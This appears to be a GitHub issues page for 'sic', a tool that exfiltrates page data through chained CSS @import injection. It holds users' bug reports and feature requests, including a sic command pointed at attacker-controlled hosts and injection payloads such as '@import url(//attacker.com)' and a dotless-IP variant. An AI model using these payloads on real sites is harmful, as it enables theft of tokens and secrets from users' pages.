d0nutptr / sic
A tool to perform Sequential Import Chaining
Home Page: https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b
License: MIT License
I tried exfiltrating the <meta> tag and it gets stuck - it makes 2 requests and then all other requests are set to pending. I have to click on meta in the source code to continue exfiltrating.
After doing this and clicking on the request it says Stalled - clicking on Explanation I found out that it's queueing the requests for some of these reasons:
Is there any way this can be fixed or bypassed?
Hi,
First, great article + finding + tool
I tried to reuse it years later with different browsers (Firefox, Chrome). I did not succeed in making it work.
As I struggle a bit in Rust I have not been able to modify the code to my wish (I wrote my own "clone" of your idea in Go; it works with a bot but not with my browsers).
So my question is simple: do you know if the trick still works? If yes, on which browser?
Thanks in advance
Hey d0nut,
In testing the use of Nginx to terminate HTTPS connections for sic I receive the following error:
thread 'tokio-runtime-worker-0' panicked at 'called `Result::unwrap()` on an `Err` value: RelativeUrlWithoutBase', src/libcore/result.rs:999:5
This happens when supplying a Protocol Relative URL as the Polling or Callback host like this:
./sic -p 3000 --ph "//a.pwnu.net" --ch "//b.pwnu.net" -t template_file
Using Protocol Relative URLs would allow sic payloads to work on both HTTP and HTTPS pages simultaneously.
BTW - Here's the example Nginx config I promised you.
Best,
NBK
Hey d0nut,
So I thought it was the proxy that was introducing latency, but actually even directly connected to the internet, my speeds are nowhere near the ones in your demo video. It's taking about 2 minutes to discover 5-7 characters.
Before I start doing packet capture/analysis I wanted to make sure that you haven't run into this problem before. I'm testing w/ Chrome and FF on Win 10, sic is running on an Ubuntu VPS w/out firewall. Did you have any special TCP settings on the client or server?
Also, lack of a Content-Type header is causing IE to not evaluate the CSS.
Also, also, I see mention of an environmental variable for debugging. How is that used?
Thanks
Hey d0nut, here's another enhancement request.
Since we're specifying charset on the command line, why not also allow specifying a default staging len value? This way, if no path is specified, a targeted payload could still be delivered.
For example if we could only inject (assuming protocol relative url support):
@import url(//attacker.com)
Then a payload could be generated using whatever len argument was specified via the command line (a sensible default, like 12, could be assumed if none is provided via URL or CLI).
This would have the advantage of limiting the characters required for successful injection to only ().a-z/. This could be reduced further to just ()0-9/ using a dotless IP:
@import url(//16843009)
Wouldn't that be cool?